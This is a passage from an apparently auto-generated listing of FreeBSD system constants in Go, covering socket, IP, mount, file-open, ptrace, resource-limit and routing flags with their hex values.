(line 890) | IPV6_PREFER_TEMPADDR = 0x3f constant IPV6_RECVDSTOPTS (line 891) | IPV6_RECVDSTOPTS = 0x28 constant IPV6_RECVFLOWID (line 892) | IPV6_RECVFLOWID = 0x46 constant IPV6_RECVHOPLIMIT (line 893) | IPV6_RECVHOPLIMIT = 0x25 constant IPV6_RECVHOPOPTS (line 894) | IPV6_RECVHOPOPTS = 0x27 constant IPV6_RECVORIGDSTADDR (line 895) | IPV6_RECVORIGDSTADDR = 0x48 constant IPV6_RECVPATHMTU (line 896) | IPV6_RECVPATHMTU = 0x2b constant IPV6_RECVPKTINFO (line 897) | IPV6_RECVPKTINFO = 0x24 constant IPV6_RECVRSSBUCKETID (line 898) | IPV6_RECVRSSBUCKETID = 0x47 constant IPV6_RECVRTHDR (line 899) | IPV6_RECVRTHDR = 0x26 constant IPV6_RECVTCLASS (line 900) | IPV6_RECVTCLASS = 0x39 constant IPV6_RSSBUCKETID (line 901) | IPV6_RSSBUCKETID = 0x45 constant IPV6_RSS_LISTEN_BUCKET (line 902) | IPV6_RSS_LISTEN_BUCKET = 0x42 constant IPV6_RTHDR (line 903) | IPV6_RTHDR = 0x33 constant IPV6_RTHDRDSTOPTS (line 904) | IPV6_RTHDRDSTOPTS = 0x23 constant IPV6_RTHDR_LOOSE (line 905) | IPV6_RTHDR_LOOSE = 0x0 constant IPV6_RTHDR_STRICT (line 906) | IPV6_RTHDR_STRICT = 0x1 constant IPV6_RTHDR_TYPE_0 (line 907) | IPV6_RTHDR_TYPE_0 = 0x0 constant IPV6_SOCKOPT_RESERVED1 (line 908) | IPV6_SOCKOPT_RESERVED1 = 0x3 constant IPV6_TCLASS (line 909) | IPV6_TCLASS = 0x3d constant IPV6_UNICAST_HOPS (line 910) | IPV6_UNICAST_HOPS = 0x4 constant IPV6_USE_MIN_MTU (line 911) | IPV6_USE_MIN_MTU = 0x2a constant IPV6_V6ONLY (line 912) | IPV6_V6ONLY = 0x1b constant IPV6_VERSION (line 913) | IPV6_VERSION = 0x60 constant IPV6_VERSION_MASK (line 914) | IPV6_VERSION_MASK = 0xf0 constant IPV6_VLAN_PCP (line 915) | IPV6_VLAN_PCP = 0x4b constant IP_ADD_MEMBERSHIP (line 916) | IP_ADD_MEMBERSHIP = 0xc constant IP_ADD_SOURCE_MEMBERSHIP (line 917) | IP_ADD_SOURCE_MEMBERSHIP = 0x46 constant IP_BINDANY (line 918) | IP_BINDANY = 0x18 constant IP_BINDMULTI (line 919) | IP_BINDMULTI = 0x19 constant IP_BLOCK_SOURCE (line 920) | IP_BLOCK_SOURCE = 0x48 constant IP_DEFAULT_MULTICAST_LOOP (line 921) | IP_DEFAULT_MULTICAST_LOOP = 0x1 constant IP_DEFAULT_MULTICAST_TTL (line 922) | IP_DEFAULT_MULTICAST_TTL = 0x1 constant IP_DF (line 923) | IP_DF = 0x4000 constant IP_DONTFRAG (line 924) | IP_DONTFRAG = 0x43 constant IP_DROP_MEMBERSHIP (line 925) | IP_DROP_MEMBERSHIP = 0xd constant IP_DROP_SOURCE_MEMBERSHIP (line 926) | IP_DROP_SOURCE_MEMBERSHIP = 0x47 constant IP_DUMMYNET3 (line 927) | IP_DUMMYNET3 = 0x31 constant IP_DUMMYNET_CONFIGURE (line 928) | IP_DUMMYNET_CONFIGURE = 0x3c constant IP_DUMMYNET_DEL (line 929) | IP_DUMMYNET_DEL = 0x3d constant IP_DUMMYNET_FLUSH (line 930) | IP_DUMMYNET_FLUSH = 0x3e constant IP_DUMMYNET_GET (line 931) | IP_DUMMYNET_GET = 0x40 constant IP_FLOWID (line 932) | IP_FLOWID = 0x5a constant IP_FLOWTYPE (line 933) | IP_FLOWTYPE = 0x5b constant IP_FW3 (line 934) | IP_FW3 = 0x30 constant IP_FW_ADD (line 935) | IP_FW_ADD = 0x32 constant IP_FW_DEL (line 936) | IP_FW_DEL = 0x33 constant IP_FW_FLUSH (line 937) | IP_FW_FLUSH = 0x34 constant IP_FW_GET (line 938) | IP_FW_GET = 0x36 constant IP_FW_NAT_CFG (line 939) | IP_FW_NAT_CFG = 0x38 constant IP_FW_NAT_DEL (line 940) | IP_FW_NAT_DEL = 0x39 constant IP_FW_NAT_GET_CONFIG (line 941) | IP_FW_NAT_GET_CONFIG = 0x3a constant IP_FW_NAT_GET_LOG (line 942) | IP_FW_NAT_GET_LOG = 0x3b constant IP_FW_RESETLOG (line 943) | IP_FW_RESETLOG = 0x37 constant IP_FW_TABLE_ADD (line 944) | IP_FW_TABLE_ADD = 0x28 constant IP_FW_TABLE_DEL (line 945) | IP_FW_TABLE_DEL = 0x29 constant IP_FW_TABLE_FLUSH (line 946) | IP_FW_TABLE_FLUSH = 0x2a constant IP_FW_TABLE_GETSIZE (line 947) | IP_FW_TABLE_GETSIZE = 0x2b constant IP_FW_TABLE_LIST (line 948) | IP_FW_TABLE_LIST = 0x2c constant IP_FW_ZERO (line 949) | IP_FW_ZERO = 0x35 constant IP_HDRINCL (line 950) | IP_HDRINCL = 0x2 constant IP_IPSEC_POLICY (line 951) | IP_IPSEC_POLICY = 0x15 constant IP_MAXPACKET (line 952) | IP_MAXPACKET = 0xffff constant IP_MAX_GROUP_SRC_FILTER (line 953) | IP_MAX_GROUP_SRC_FILTER = 0x200 constant IP_MAX_MEMBERSHIPS (line 954) | IP_MAX_MEMBERSHIPS = 0xfff constant IP_MAX_SOCK_MUTE_FILTER (line 955) | IP_MAX_SOCK_MUTE_FILTER = 0x80 constant IP_MAX_SOCK_SRC_FILTER (line 956) | IP_MAX_SOCK_SRC_FILTER = 0x80 constant IP_MF (line 957) | IP_MF = 0x2000 constant IP_MINTTL (line 958) | IP_MINTTL = 0x42 constant IP_MSFILTER (line 959) | IP_MSFILTER = 0x4a constant IP_MSS (line 960) | IP_MSS = 0x240 constant IP_MULTICAST_IF (line 961) | IP_MULTICAST_IF = 0x9 constant IP_MULTICAST_LOOP (line 962) | IP_MULTICAST_LOOP = 0xb constant IP_MULTICAST_TTL (line 963) | IP_MULTICAST_TTL = 0xa constant IP_MULTICAST_VIF (line 964) | IP_MULTICAST_VIF = 0xe constant IP_OFFMASK (line 965) | IP_OFFMASK = 0x1fff constant IP_ONESBCAST (line 966) | IP_ONESBCAST = 0x17 constant IP_OPTIONS (line 967) | IP_OPTIONS = 0x1 constant IP_ORIGDSTADDR (line 968) | IP_ORIGDSTADDR = 0x1b constant IP_PORTRANGE (line 969) | IP_PORTRANGE = 0x13 constant IP_PORTRANGE_DEFAULT (line 970) | IP_PORTRANGE_DEFAULT = 0x0 constant IP_PORTRANGE_HIGH (line 971) | IP_PORTRANGE_HIGH = 0x1 constant IP_PORTRANGE_LOW (line 972) | IP_PORTRANGE_LOW = 0x2 constant IP_RECVDSTADDR (line 973) | IP_RECVDSTADDR = 0x7 constant IP_RECVFLOWID (line 974) | IP_RECVFLOWID = 0x5d constant IP_RECVIF (line 975) | IP_RECVIF = 0x14 constant IP_RECVOPTS (line 976) | IP_RECVOPTS = 0x5 constant IP_RECVORIGDSTADDR (line 977) | IP_RECVORIGDSTADDR = 0x1b constant IP_RECVRETOPTS (line 978) | IP_RECVRETOPTS = 0x6 constant IP_RECVRSSBUCKETID (line 979) | IP_RECVRSSBUCKETID = 0x5e constant IP_RECVTOS (line 980) | IP_RECVTOS = 0x44 constant IP_RECVTTL (line 981) | IP_RECVTTL = 0x41 constant IP_RETOPTS (line 982) | IP_RETOPTS = 0x8 constant IP_RF (line 983) | IP_RF = 0x8000 constant IP_RSSBUCKETID (line 984) | IP_RSSBUCKETID = 0x5c constant IP_RSS_LISTEN_BUCKET (line 985) | IP_RSS_LISTEN_BUCKET = 0x1a constant IP_RSVP_OFF (line 986) | IP_RSVP_OFF = 0x10 constant IP_RSVP_ON (line 987) | IP_RSVP_ON = 0xf constant IP_RSVP_VIF_OFF (line 988) | IP_RSVP_VIF_OFF = 0x12 constant IP_RSVP_VIF_ON (line 989) | IP_RSVP_VIF_ON = 0x11 constant IP_SENDSRCADDR (line 990) | IP_SENDSRCADDR = 0x7 constant IP_TOS (line 991) | IP_TOS = 0x3 constant IP_TTL (line 992) | IP_TTL = 0x4 constant IP_UNBLOCK_SOURCE (line 993) | IP_UNBLOCK_SOURCE = 0x49 constant IP_VLAN_PCP (line 994) | IP_VLAN_PCP = 0x4b constant ISIG (line 995) | ISIG = 0x80 constant ISTRIP (line 996) | ISTRIP = 0x20 constant ITIMER_PROF (line 997) | ITIMER_PROF = 0x2 constant ITIMER_REAL (line 998) | ITIMER_REAL = 0x0 constant ITIMER_VIRTUAL (line 999) | ITIMER_VIRTUAL = 0x1 constant IXANY (line 1000) | IXANY = 0x800 constant IXOFF (line 1001) | IXOFF = 0x400 constant IXON (line 1002) | IXON = 0x200 constant KERN_HOSTNAME (line 1003) | KERN_HOSTNAME = 0xa constant KERN_OSRELEASE (line 1004) | KERN_OSRELEASE = 0x2 constant KERN_OSTYPE (line 1005) | KERN_OSTYPE = 0x1 constant KERN_VERSION (line 1006) | KERN_VERSION = 0x4 constant LOCAL_CONNWAIT (line 1007) | LOCAL_CONNWAIT = 0x4 constant LOCAL_CREDS (line 1008) | LOCAL_CREDS = 0x2 constant LOCAL_PEERCRED (line 1009) | LOCAL_PEERCRED = 0x1 constant LOCAL_VENDOR (line 1010) | LOCAL_VENDOR = 0x80000000 constant LOCK_EX (line 1011) | LOCK_EX = 0x2 constant LOCK_NB (line 1012) | LOCK_NB = 0x4 constant LOCK_SH (line 1013) | LOCK_SH = 0x1 constant LOCK_UN (line 1014) | LOCK_UN = 0x8 constant MADV_AUTOSYNC (line 1015) | MADV_AUTOSYNC = 0x7 constant MADV_CORE (line 1016) | MADV_CORE = 0x9 constant MADV_DONTNEED (line 1017) | MADV_DONTNEED = 0x4 constant MADV_FREE (line 1018) | MADV_FREE = 0x5 constant MADV_NOCORE (line 1019) | MADV_NOCORE = 0x8 constant MADV_NORMAL (line 1020) | MADV_NORMAL = 0x0 constant MADV_NOSYNC (line 1021) | MADV_NOSYNC = 0x6 constant MADV_PROTECT (line 1022) | MADV_PROTECT = 0xa constant MADV_RANDOM (line 1023) | MADV_RANDOM = 0x1 constant MADV_SEQUENTIAL (line 1024) | MADV_SEQUENTIAL = 0x2 constant MADV_WILLNEED (line 1025) | MADV_WILLNEED = 0x3 constant MAP_32BIT (line 1026) | MAP_32BIT = 0x80000 constant MAP_ALIGNED_SUPER (line 1027) | MAP_ALIGNED_SUPER = 0x1000000 constant MAP_ALIGNMENT_MASK (line 1028) | MAP_ALIGNMENT_MASK = -0x1000000 constant MAP_ALIGNMENT_SHIFT (line 1029) | MAP_ALIGNMENT_SHIFT = 0x18 constant MAP_ANON (line 1030) | MAP_ANON = 0x1000 constant MAP_ANONYMOUS (line 1031) | MAP_ANONYMOUS = 0x1000 constant MAP_COPY (line 1032) | MAP_COPY = 0x2 constant MAP_EXCL (line 1033) | MAP_EXCL = 0x4000 constant MAP_FILE (line 1034) | MAP_FILE = 0x0 constant MAP_FIXED (line 1035) | MAP_FIXED = 0x10 constant MAP_GUARD (line 1036) | MAP_GUARD = 0x2000 constant MAP_HASSEMAPHORE (line 1037) | MAP_HASSEMAPHORE = 0x200 constant MAP_NOCORE (line 1038) | MAP_NOCORE = 0x20000 constant MAP_NOSYNC (line 1039) | MAP_NOSYNC = 0x800 constant MAP_PREFAULT_READ (line 1040) | MAP_PREFAULT_READ = 0x40000 constant MAP_PRIVATE (line 1041) | MAP_PRIVATE = 0x2 constant MAP_RESERVED0020 (line 1042) | MAP_RESERVED0020 = 0x20 constant MAP_RESERVED0040 (line 1043) | MAP_RESERVED0040 = 0x40 constant MAP_RESERVED0080 (line 1044) | MAP_RESERVED0080 = 0x80 constant MAP_RESERVED0100 (line 1045) | MAP_RESERVED0100 = 0x100 constant MAP_SHARED (line 1046) | MAP_SHARED = 0x1 constant MAP_STACK (line 1047) | MAP_STACK = 0x400 constant MCAST_BLOCK_SOURCE (line 1048) | MCAST_BLOCK_SOURCE = 0x54 constant MCAST_EXCLUDE (line 1049) | MCAST_EXCLUDE = 0x2 constant MCAST_INCLUDE (line 1050) | MCAST_INCLUDE = 0x1 constant MCAST_JOIN_GROUP (line 1051) | MCAST_JOIN_GROUP = 0x50 constant MCAST_JOIN_SOURCE_GROUP (line 1052) | MCAST_JOIN_SOURCE_GROUP = 0x52 constant MCAST_LEAVE_GROUP (line 1053) | MCAST_LEAVE_GROUP = 0x51 constant MCAST_LEAVE_SOURCE_GROUP (line 1054) | MCAST_LEAVE_SOURCE_GROUP = 0x53 constant MCAST_UNBLOCK_SOURCE (line 1055) | MCAST_UNBLOCK_SOURCE = 0x55 constant MCAST_UNDEFINED (line 1056) | MCAST_UNDEFINED = 0x0 constant MCL_CURRENT (line 1057) | MCL_CURRENT = 0x1 constant MCL_FUTURE (line 1058) | MCL_FUTURE = 0x2 constant MNT_ACLS (line 1059) | MNT_ACLS = 0x8000000 constant MNT_ASYNC (line 1060) | MNT_ASYNC = 0x40 constant MNT_AUTOMOUNTED (line 1061) | MNT_AUTOMOUNTED = 0x200000000 constant MNT_BYFSID (line 1062) | MNT_BYFSID = 0x8000000 constant MNT_CMDFLAGS (line 1063) | MNT_CMDFLAGS = 0xd0f0000 constant MNT_DEFEXPORTED (line 1064) | MNT_DEFEXPORTED = 0x200 constant MNT_DELEXPORT (line 1065) | MNT_DELEXPORT = 0x20000 constant MNT_EXKERB (line 1066) | MNT_EXKERB = 0x800 constant MNT_EXPORTANON (line 1067) | MNT_EXPORTANON = 0x400 constant MNT_EXPORTED (line 1068) | MNT_EXPORTED = 0x100 constant MNT_EXPUBLIC (line 1069) | MNT_EXPUBLIC = 0x20000000 constant MNT_EXRDONLY (line 1070) | MNT_EXRDONLY = 0x80 constant MNT_FORCE (line 1071) | MNT_FORCE = 0x80000 constant MNT_GJOURNAL (line 1072) | MNT_GJOURNAL = 0x2000000 constant MNT_IGNORE (line 1073) | MNT_IGNORE = 0x800000 constant MNT_LAZY (line 1074) | MNT_LAZY = 0x3 constant MNT_LOCAL (line 1075) | MNT_LOCAL = 0x1000 constant MNT_MULTILABEL (line 1076) | MNT_MULTILABEL = 0x4000000 constant MNT_NFS4ACLS (line 1077) | MNT_NFS4ACLS = 0x10 constant MNT_NOATIME (line 1078) | MNT_NOATIME = 0x10000000 constant MNT_NOCLUSTERR (line 1079) | MNT_NOCLUSTERR = 0x40000000 constant MNT_NOCLUSTERW (line 1080) | MNT_NOCLUSTERW = 0x80000000 constant MNT_NOEXEC (line 1081) | MNT_NOEXEC = 0x4 constant MNT_NONBUSY (line 1082) | MNT_NONBUSY = 0x4000000 constant MNT_NOSUID (line 1083) | MNT_NOSUID = 0x8 constant MNT_NOSYMFOLLOW (line 1084) | MNT_NOSYMFOLLOW = 0x400000 constant MNT_NOWAIT (line 1085) | MNT_NOWAIT = 0x2 constant MNT_QUOTA (line 1086) | MNT_QUOTA = 0x2000 constant MNT_RDONLY (line 1087) | MNT_RDONLY = 0x1 constant MNT_RELOAD (line 1088) | MNT_RELOAD = 0x40000 constant MNT_ROOTFS (line 1089) | MNT_ROOTFS = 0x4000 constant MNT_SNAPSHOT (line 1090) | MNT_SNAPSHOT = 0x1000000 constant MNT_SOFTDEP (line 1091) | MNT_SOFTDEP = 0x200000 constant MNT_SUIDDIR (line 1092) | MNT_SUIDDIR = 0x100000 constant MNT_SUJ (line 1093) | MNT_SUJ = 0x100000000 constant MNT_SUSPEND (line 1094) | MNT_SUSPEND = 0x4 constant MNT_SYNCHRONOUS (line 1095) | MNT_SYNCHRONOUS = 0x2 constant MNT_UNION (line 1096) | MNT_UNION = 0x20 constant MNT_UNTRUSTED (line 1097) | MNT_UNTRUSTED = 0x800000000 constant MNT_UPDATE (line 1098) | MNT_UPDATE = 0x10000 constant MNT_UPDATEMASK (line 1099) | MNT_UPDATEMASK = 0xad8d0807e constant MNT_USER (line 1100) | MNT_USER = 0x8000 constant MNT_VERIFIED (line 1101) | MNT_VERIFIED = 0x400000000 constant MNT_VISFLAGMASK (line 1102) | MNT_VISFLAGMASK = 0xffef0ffff constant MNT_WAIT (line 1103) | MNT_WAIT = 0x1 constant MSG_CMSG_CLOEXEC (line 1104) | MSG_CMSG_CLOEXEC = 0x40000 constant MSG_COMPAT (line 1105) | MSG_COMPAT = 0x8000 constant MSG_CTRUNC (line 1106) | MSG_CTRUNC = 0x20 constant MSG_DONTROUTE (line 1107) | MSG_DONTROUTE = 0x4 constant MSG_DONTWAIT (line 1108) | MSG_DONTWAIT = 0x80 constant MSG_EOF (line 1109) | MSG_EOF = 0x100 constant MSG_EOR (line 1110) | MSG_EOR = 0x8 constant MSG_NBIO (line 1111) | MSG_NBIO = 0x4000 constant MSG_NOSIGNAL (line 1112) | MSG_NOSIGNAL = 0x20000 constant MSG_NOTIFICATION (line 1113) | MSG_NOTIFICATION = 0x2000 constant MSG_OOB (line 1114) | MSG_OOB = 0x1 constant MSG_PEEK (line 1115) | MSG_PEEK = 0x2 constant MSG_TRUNC (line 1116) | MSG_TRUNC = 0x10 constant MSG_WAITALL (line 1117) | MSG_WAITALL = 0x40 constant MSG_WAITFORONE (line 1118) | MSG_WAITFORONE = 0x80000 constant MS_ASYNC (line 1119) | MS_ASYNC = 0x1 constant MS_INVALIDATE (line 1120) | MS_INVALIDATE = 0x2 constant MS_SYNC (line 1121) | MS_SYNC = 0x0 constant NAME_MAX (line 1122) | NAME_MAX = 0xff constant NET_RT_DUMP (line 1123) | NET_RT_DUMP = 0x1 constant NET_RT_FLAGS (line 1124) | NET_RT_FLAGS = 0x2 constant NET_RT_IFLIST (line 1125) | NET_RT_IFLIST = 0x3 constant NET_RT_IFLISTL (line 1126) | NET_RT_IFLISTL = 0x5 constant NET_RT_IFMALIST (line 1127) | NET_RT_IFMALIST = 0x4 constant NFDBITS (line 1128) | NFDBITS = 0x40 constant NOFLSH (line 1129) | NOFLSH = 0x80000000 constant NOKERNINFO (line 1130) | NOKERNINFO = 0x2000000 constant NOTE_ABSTIME (line 1131) | NOTE_ABSTIME = 0x10 constant NOTE_ATTRIB (line 1132) | NOTE_ATTRIB = 0x8 constant NOTE_CHILD (line 1133) | NOTE_CHILD = 0x4 constant NOTE_CLOSE (line 1134) | NOTE_CLOSE = 0x100 constant NOTE_CLOSE_WRITE (line 1135) | NOTE_CLOSE_WRITE = 0x200 constant NOTE_DELETE (line 1136) | NOTE_DELETE = 0x1 constant NOTE_EXEC (line 1137) | NOTE_EXEC = 0x20000000 constant NOTE_EXIT (line 1138) | NOTE_EXIT = 0x80000000 constant NOTE_EXTEND (line 1139) | NOTE_EXTEND = 0x4 constant NOTE_FFAND (line 1140) | NOTE_FFAND = 0x40000000 constant NOTE_FFCOPY (line 1141) | NOTE_FFCOPY = 0xc0000000 constant NOTE_FFCTRLMASK (line 1142) | NOTE_FFCTRLMASK = 0xc0000000 constant NOTE_FFLAGSMASK (line 1143) | NOTE_FFLAGSMASK = 0xffffff constant NOTE_FFNOP (line 1144) | NOTE_FFNOP = 0x0 constant NOTE_FFOR (line 1145) | NOTE_FFOR = 0x80000000 constant NOTE_FILE_POLL (line 1146) | NOTE_FILE_POLL = 0x2 constant NOTE_FORK (line 1147) | NOTE_FORK = 0x40000000 constant NOTE_LINK (line 1148) | NOTE_LINK = 0x10 constant NOTE_LOWAT (line 1149) | NOTE_LOWAT = 0x1 constant NOTE_MSECONDS (line 1150) | NOTE_MSECONDS = 0x2 constant NOTE_NSECONDS (line 1151) | NOTE_NSECONDS = 0x8 constant NOTE_OPEN (line 1152) | NOTE_OPEN = 0x80 constant NOTE_PCTRLMASK (line 1153) | NOTE_PCTRLMASK = 0xf0000000 constant NOTE_PDATAMASK (line 1154) | NOTE_PDATAMASK = 0xfffff constant NOTE_READ (line 1155) | NOTE_READ = 0x400 constant NOTE_RENAME (line 1156) | NOTE_RENAME = 0x20 constant NOTE_REVOKE (line 1157) | NOTE_REVOKE = 0x40 constant NOTE_SECONDS (line 1158) | NOTE_SECONDS = 0x1 constant NOTE_TRACK (line 1159) | NOTE_TRACK = 0x1 constant NOTE_TRACKERR (line 1160) | NOTE_TRACKERR = 0x2 constant NOTE_TRIGGER (line 1161) | NOTE_TRIGGER = 0x1000000 constant NOTE_USECONDS (line 1162) | NOTE_USECONDS = 0x4 constant NOTE_WRITE (line 1163) | NOTE_WRITE = 0x2 constant OCRNL (line 1164) | OCRNL = 0x10 constant ONLCR (line 1165) | ONLCR = 0x2 constant ONLRET (line 1166) | ONLRET = 0x40 constant ONOCR (line 1167) | ONOCR = 0x20 constant ONOEOT (line 1168) | ONOEOT = 0x8 constant OPOST (line 1169) | OPOST = 0x1 constant OXTABS (line 1170) | OXTABS = 0x4 constant O_ACCMODE (line 1171) | O_ACCMODE = 0x3 constant O_APPEND (line 1172) | O_APPEND = 0x8 constant O_ASYNC (line 1173) | O_ASYNC = 0x40 constant O_CLOEXEC (line 1174) | O_CLOEXEC = 0x100000 constant O_CREAT (line 1175) | O_CREAT = 0x200 constant O_DIRECT (line 1176) | O_DIRECT = 0x10000 constant O_DIRECTORY (line 1177) | O_DIRECTORY = 0x20000 constant O_EXCL (line 1178) | O_EXCL = 0x800 constant O_EXEC (line 1179) | O_EXEC = 0x40000 constant O_EXLOCK (line 1180) | O_EXLOCK = 0x20 constant O_FSYNC (line 1181) | O_FSYNC = 0x80 constant O_NDELAY (line 1182) | O_NDELAY = 0x4 constant O_NOCTTY (line 1183) | O_NOCTTY = 0x8000 constant O_NOFOLLOW (line 1184) | O_NOFOLLOW = 0x100 constant O_NONBLOCK (line 1185) | O_NONBLOCK = 0x4 constant O_RDONLY (line 1186) | O_RDONLY = 0x0 constant O_RDWR (line 1187) | O_RDWR = 0x2 constant O_RESOLVE_BENEATH (line 1188) | O_RESOLVE_BENEATH = 0x800000 constant O_SEARCH (line 1189) | O_SEARCH = 0x40000 constant O_SHLOCK (line 1190) | O_SHLOCK = 0x10 constant O_SYNC (line 1191) | O_SYNC = 0x80 constant O_TRUNC (line 1192) | O_TRUNC = 0x400 constant O_TTY_INIT (line 1193) | O_TTY_INIT = 0x80000 constant O_VERIFY (line 1194) | O_VERIFY = 0x200000 constant O_WRONLY (line 1195) | O_WRONLY = 0x1 constant PARENB (line 1196) | PARENB = 0x1000 constant PARMRK (line 1197) | PARMRK = 0x8 constant PARODD (line 1198) | PARODD = 0x2000 constant PENDIN (line 1199) | PENDIN = 0x20000000 constant PIOD_READ_D (line 1200) | PIOD_READ_D = 0x1 constant PIOD_READ_I (line 1201) | PIOD_READ_I = 0x3 constant PIOD_WRITE_D (line 1202) | PIOD_WRITE_D = 0x2 constant PIOD_WRITE_I (line 1203) | PIOD_WRITE_I = 0x4 constant PRIO_PGRP (line 1204) | PRIO_PGRP = 0x1 constant PRIO_PROCESS (line 1205) | PRIO_PROCESS = 0x0 constant PRIO_USER (line 1206) | PRIO_USER = 0x2 constant PROT_EXEC (line 1207) | PROT_EXEC = 0x4 constant PROT_NONE (line 1208) | PROT_NONE = 0x0 constant PROT_READ (line 1209) | PROT_READ = 0x1 constant PROT_WRITE (line 1210) | PROT_WRITE = 0x2 constant PTRACE_DEFAULT (line 1211) | PTRACE_DEFAULT = 0x1 constant PTRACE_EXEC (line 1212) | PTRACE_EXEC = 0x1 constant PTRACE_FORK (line 1213) | PTRACE_FORK = 0x8 constant PTRACE_LWP (line 1214) | PTRACE_LWP = 0x10 constant PTRACE_SCE (line 1215) | PTRACE_SCE = 0x2 constant PTRACE_SCX (line 1216) | PTRACE_SCX = 0x4 constant PTRACE_SYSCALL (line 1217) | PTRACE_SYSCALL = 0x6 constant PTRACE_VFORK (line 1218) | PTRACE_VFORK = 0x20 constant PT_ATTACH (line 1219) | PT_ATTACH = 0xa constant PT_CLEARSTEP (line 1220) | PT_CLEARSTEP = 0x10 constant PT_CONTINUE (line 1221) | PT_CONTINUE = 0x7 constant PT_DETACH (line 1222) | PT_DETACH = 0xb constant PT_FIRSTMACH (line 1223) | PT_FIRSTMACH = 0x40 constant PT_FOLLOW_FORK (line 1224) | PT_FOLLOW_FORK = 0x17 constant PT_GETDBREGS (line 1225) | PT_GETDBREGS = 0x25 constant PT_GETFPREGS (line 1226) | PT_GETFPREGS = 0x23 constant PT_GETFSBASE (line 1227) | PT_GETFSBASE = 0x47 constant PT_GETGSBASE (line 1228) | PT_GETGSBASE = 0x49 constant PT_GETLWPLIST (line 1229) | PT_GETLWPLIST = 0xf constant PT_GETNUMLWPS (line 1230) | PT_GETNUMLWPS = 0xe constant PT_GETREGS (line 1231) | PT_GETREGS = 0x21 constant PT_GETXSTATE (line 1232) | PT_GETXSTATE = 0x45 constant PT_GETXSTATE_INFO (line 1233) | PT_GETXSTATE_INFO = 0x44 constant PT_GET_EVENT_MASK (line 1234) | PT_GET_EVENT_MASK = 0x19 constant PT_GET_SC_ARGS (line 1235) | PT_GET_SC_ARGS = 0x1b constant PT_GET_SC_RET (line 1236) | PT_GET_SC_RET = 0x1c constant PT_IO (line 1237) | PT_IO = 0xc constant PT_KILL (line 1238) | PT_KILL = 0x8 constant PT_LWPINFO (line 1239) | PT_LWPINFO = 0xd constant PT_LWP_EVENTS (line 1240) | PT_LWP_EVENTS = 0x18 constant PT_READ_D (line 1241) | PT_READ_D = 0x2 constant PT_READ_I (line 1242) | PT_READ_I = 0x1 constant PT_RESUME (line 1243) | PT_RESUME = 0x13 constant PT_SETDBREGS (line 1244) | PT_SETDBREGS = 0x26 constant PT_SETFPREGS (line 1245) | PT_SETFPREGS = 0x24 constant PT_SETFSBASE (line 1246) | PT_SETFSBASE = 0x48 constant PT_SETGSBASE (line 1247) | PT_SETGSBASE = 0x4a constant PT_SETREGS (line 1248) | PT_SETREGS = 0x22 constant PT_SETSTEP (line 1249) | PT_SETSTEP = 0x11 constant PT_SETXSTATE (line 1250) | PT_SETXSTATE = 0x46 constant PT_SET_EVENT_MASK (line 1251) | PT_SET_EVENT_MASK = 0x1a constant PT_STEP (line 1252) | PT_STEP = 0x9 constant PT_SUSPEND (line 1253) | PT_SUSPEND = 0x12 constant PT_SYSCALL (line 1254) | PT_SYSCALL = 0x16 constant PT_TO_SCE (line 1255) | PT_TO_SCE = 0x14 constant PT_TO_SCX (line 1256) | PT_TO_SCX = 0x15 constant PT_TRACE_ME (line 1257) | PT_TRACE_ME = 0x0 constant PT_VM_ENTRY (line 1258) | PT_VM_ENTRY = 0x29 constant PT_VM_TIMESTAMP (line 1259) | PT_VM_TIMESTAMP = 0x28 constant PT_WRITE_D (line 1260) | PT_WRITE_D = 0x5 constant PT_WRITE_I (line 1261) | PT_WRITE_I = 0x4 constant P_ZONEID (line 1262) | P_ZONEID = 0xc constant RLIMIT_AS (line 1263) | RLIMIT_AS = 0xa constant RLIMIT_CORE (line 1264) | RLIMIT_CORE = 0x4 constant RLIMIT_CPU (line 1265) | RLIMIT_CPU = 0x0 constant RLIMIT_DATA (line 1266) | RLIMIT_DATA = 0x2 constant RLIMIT_FSIZE (line 1267) | RLIMIT_FSIZE = 0x1 constant RLIMIT_MEMLOCK (line 1268) | RLIMIT_MEMLOCK = 0x6 constant RLIMIT_NOFILE (line 1269) | RLIMIT_NOFILE = 0x8 constant RLIMIT_NPROC (line 1270) | RLIMIT_NPROC = 0x7 constant RLIMIT_RSS (line 1271) | RLIMIT_RSS = 0x5 constant RLIMIT_STACK (line 1272) | RLIMIT_STACK = 0x3 constant RLIM_INFINITY (line 1273) | RLIM_INFINITY = 0x7fffffffffffffff constant RTAX_AUTHOR (line 1274) | RTAX_AUTHOR = 0x6 constant RTAX_BRD (line 1275) | RTAX_BRD = 0x7 constant RTAX_DST (line 1276) | RTAX_DST = 0x0 constant RTAX_GATEWAY (line 1277) | RTAX_GATEWAY = 0x1 constant RTAX_GENMASK (line 1278) | RTAX_GENMASK = 0x3 constant RTAX_IFA (line 1279) | RTAX_IFA = 0x5 constant RTAX_IFP (line 1280) | RTAX_IFP = 0x4 constant RTAX_MAX (line 1281) | RTAX_MAX = 0x8 constant RTAX_NETMASK (line 1282) | RTAX_NETMASK = 0x2 constant RTA_AUTHOR (line 1283) | RTA_AUTHOR = 0x40 constant RTA_BRD (line 1284) | RTA_BRD = 0x80 constant RTA_DST (line 1285) | RTA_DST = 0x1 constant RTA_GATEWAY (line 1286) | RTA_GATEWAY = 0x2 constant RTA_GENMASK (line 1287) | RTA_GENMASK = 0x8 constant RTA_IFA (line 1288) | RTA_IFA = 0x20 constant RTA_IFP (line 1289) | RTA_IFP = 0x10 constant RTA_NETMASK (line 1290) | RTA_NETMASK = 0x4 constant RTF_BLACKHOLE (line 1291) | RTF_BLACKHOLE = 0x1000 constant RTF_BROADCAST (line 1292) | RTF_BROADCAST = 0x400000 constant RTF_DONE (line 1293) | RTF_DONE = 0x40 constant RTF_DYNAMIC (line 1294) | RTF_DYNAMIC = 0x10 constant RTF_FIXEDMTU (line 1295) | RTF_FIXEDMTU = 0x80000 constant RTF_FMASK (line 1296) | RTF_FMASK = 0x1004d808 constant RTF_GATEWAY (line 1297) | RTF_GATEWAY = 0x2 constant RTF_GWFLAG_COMPAT (line 1298) | RTF_GWFLAG_COMPAT = 0x80000000 constant RTF_HOST (line 1299) | RTF_HOST = 0x4 constant RTF_LLDATA (line 1300) | RTF_LLDATA = 0x400 constant RTF_LLINFO (line 1301) | RTF_LLINFO = 0x400 constant RTF_LOCAL (line 1302) | RTF_LOCAL = 0x200000 constant RTF_MODIFIED (line 1303) | RTF_MODIFIED = 0x20 constant RTF_MULTICAST (line 1304) | RTF_MULTICAST = 0x800000 constant RTF_PINNED (line 1305) | RTF_PINNED = 0x100000 constant RTF_PROTO1 (line 1306) | RTF_PROTO1 = 0x8000 constant RTF_PROTO2 (line 1307) | RTF_PROTO2 = 